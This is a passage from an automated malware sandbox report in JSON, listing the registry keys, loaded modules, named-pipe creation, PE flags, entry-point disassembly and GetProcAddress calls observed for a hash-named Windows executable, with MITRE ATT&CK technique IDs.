\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Security Manager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74B90000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74750000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00003960)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"qoxyhdso.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67EE53F7.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"qoxyhdso.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"DISMHOST.EXE.67EE53F7.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 